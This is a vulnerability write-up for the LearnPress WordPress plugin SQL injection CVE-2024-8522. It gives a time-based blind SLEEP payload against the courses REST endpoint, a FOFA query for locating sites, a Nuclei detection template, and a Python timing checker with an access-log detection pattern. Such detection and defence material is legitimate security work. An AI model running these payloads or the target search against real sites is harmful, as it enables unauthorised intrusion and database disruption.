SQL injection vulnerability in the WordPress LearnPress plugin (CVE-2024-8522)
1. Vulnerability overview
WordPress is a free and open-source content management system built on PHP and MySQL. With it, users can create and maintain personal or business websites, blogs, e-commerce sites or applications without in-depth knowledge of programming languages or database administration. LearnPress is a WordPress learning-management (LMS) plugin. It contains an unauthenticated SQL injection vulnerability (CVE-2024-8522): the `c_only_fields` parameter of the REST endpoint `/wp-json/learnpress/v1/courses` is used in a SQL query without sufficient escaping or preparation, so an unauthenticated attacker can inject SQL into the query. Because the endpoint does not echo query results for the injected expression, the reproduction in section 4 uses a time-based blind technique (MySQL `SLEEP()`).
2. Affected versions
- WordPress LearnPress plugin, all versions up to and including 4.2.7 (per the CVE-2024-8522 record); update to the current release.
3. Asset discovery
Cyberspace search-engine query (FOFA syntax) for sites that load the plugin:
body="/wp-content/plugins/learnpress"
4. Reproduction
Send the request below. The injected `IF(COUNT(*)!=-2,(SLEEP(5)),0)` always evaluates the `SLEEP(5)` branch, so a vulnerable target answers about 5 seconds later than the same request without the parameter. Compare against that baseline request rather than trusting a single slow response, since a slow server or network would otherwise produce a false positive.
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(5)),0) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
The Nuclei template below sends two probes with different SLEEP values and matches only if both response times fall inside the corresponding windows; two distinct delays rule out a target that is merely slow. `req-condition: true` is required so the matcher can reference `duration_1` and `duration_2` across the two requests, and `condition: and` makes both windows mandatory (the default for multiple DSL expressions is "or"). The windows (3 to 4 s and 5 to 6 s) are tight; on a high-latency link widen the upper bounds.

id: WordPress-sqli

info:
  name: WordPress-sqli
  author: HAOGUOGUO                     # author
  severity: critical                    # risk level
  description: WordPress LearnPress SQL injection via c_only_fields (CVE-2024-8522)

http:
  - raw:
      - |                               # request 1, delay set to 3 seconds
        GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(3)),0) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive

      - |                               # request 2, delay set to 5 seconds
        GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(5)),0) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive

    req-condition: true                 # exposes duration_1 / duration_2 to the matcher
    matchers:
      - type: dsl
        condition: and                  # both timing windows must hold
        dsl:
          - 'duration_1>=3 && duration_1<=4'   # request 1 took between 3 and 4 s
          - 'duration_2>=5 && duration_2<=6'   # request 2 took between 5 and 6 s
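As an added example, not part of the original write-up or of the LearnPress project, the following Python script turns the single timing request above into the differential check a tester would actually run: it measures a baseline on the plain endpoint, sends SLEEP(3) and SLEEP(5) probes, and only reports the target as injectable when each probe exceeds the baseline by roughly its sleep time and the longer sleep takes measurably longer than the shorter one. It also includes an access-log pattern for the same payload for the defender side. The endpoint path and payload shape are taken from the page; the `slack` tolerance, the simulated targets and the sample log lines are constructed for the example.

```python
"""Differential timing check for the LearnPress c_only_fields SQL injection.

Added example. Only ENDPOINT and the payload shape come from the write-up;
the simulated targets, slack value and log lines below are constructed.
"""
import re
import statistics
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List

ENDPOINT = "/wp-json/learnpress/v1/courses"


def build_probe(seconds: int) -> str:
    """Request target carrying the page's payload with SLEEP(seconds).

    The comparison is always true, so the SLEEP branch always executes; the
    COUNT(*) aggregate keeps it to a single sleep rather than one per row.
    """
    payload = f"IF(COUNT(*)!=-2,(SLEEP({seconds})),0)"
    return f"{ENDPOINT}?c_only_fields={payload}"


def measure_http(base_url: str, timeout: float = 15.0) -> Callable[[str], float]:
    """Real transport: GET base_url + target and return wall-clock seconds."""
    def _measure(target: str) -> float:
        req = urllib.request.Request(base_url + target, headers={"User-Agent": "Mozilla/5.0"})
        start = time.perf_counter()
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                resp.read()
        except urllib.error.HTTPError:
            pass  # a 4xx/5xx still tells us how long the query ran
        return time.perf_counter() - start
    return _measure


def looks_injectable(measure: Callable[[str], float], delays=(3, 5),
                     baseline_reps: int = 3, slack: float = 1.0) -> Dict[str, object]:
    """Differential timing oracle.

    A single slow response proves nothing, so the check (1) takes a baseline on
    the plain endpoint, (2) requires each SLEEP(n) probe to exceed the baseline
    by at least n - slack seconds, and (3) requires the longer sleep to take
    correspondingly longer than the shorter one. `slack` absorbs jitter.
    """
    baseline = statistics.median(measure(ENDPOINT) for _ in range(baseline_reps))
    deltas = {n: measure(build_probe(n)) - baseline for n in delays}
    each_ok = all(deltas[n] >= n - slack for n in delays)
    ordered = all(deltas[b] - deltas[a] >= (b - a) - slack
                  for a, b in zip(delays, delays[1:]))
    return {"baseline": baseline, "deltas": deltas, "vulnerable": each_ok and ordered}


# --- constructed stand-ins for a target, so the check can be exercised offline ---
_SLEEP_RE = re.compile(r"SLEEP\((\d+)\)")


def simulate_vulnerable(target: str, base_latency: float = 0.25) -> float:
    """Models a target that splices c_only_fields into SQL: SLEEP(n) adds n seconds."""
    m = _SLEEP_RE.search(target)
    return base_latency + (int(m.group(1)) if m else 0)


def simulate_patched(target: str, base_latency: float = 0.25) -> float:
    """Models a target whose field names are allow-listed: the payload is ignored."""
    return base_latency


def simulate_slow(target: str) -> float:
    """Models a uniformly slow server (4 s per request); must not be flagged."""
    return 4.0


# --- defender side: spot the payload in web-server access logs ---
LOG_PATTERN = re.compile(r'c_only_fields=[^ &"]*\b(?:SLEEP|BENCHMARK|SELECT|UNION)\b', re.I)

SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    '203.0.113.7 - - [10/Sep/2024:10:00:01 +0000] "GET /wp-json/learnpress/v1/courses?per_page=10 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Sep/2024:10:00:02 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(5)),0) HTTP/1.1" 200 46',
    '198.51.100.2 - - [10/Sep/2024:10:00:03 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=ID,post_title HTTP/1.1" 200 3300',
]


def flag_access_log(lines: Iterable[str]) -> List[str]:
    """Return log lines whose c_only_fields value carries a SQL keyword."""
    return [line for line in lines if LOG_PATTERN.search(line)]


if __name__ == "__main__":
    for name, sim in [("vulnerable", simulate_vulnerable), ("patched", simulate_patched),
                      ("slow-but-clean", simulate_slow)]:
        print(name, looks_injectable(sim))
    print("flagged:", flag_access_log(SAMPLE_LOG))
    # Against a real host: looks_injectable(measure_http("https://target.example"))
```

The slow-server case is the reason for the baseline and the ordering check: every request there takes 4 seconds, which would satisfy a naive "took longer than 3 seconds" test, yet the deltas are zero and the verdict is negative. On a live target, note that each `SLEEP(5)` ties up a database connection for five seconds, so keep the number of probes small.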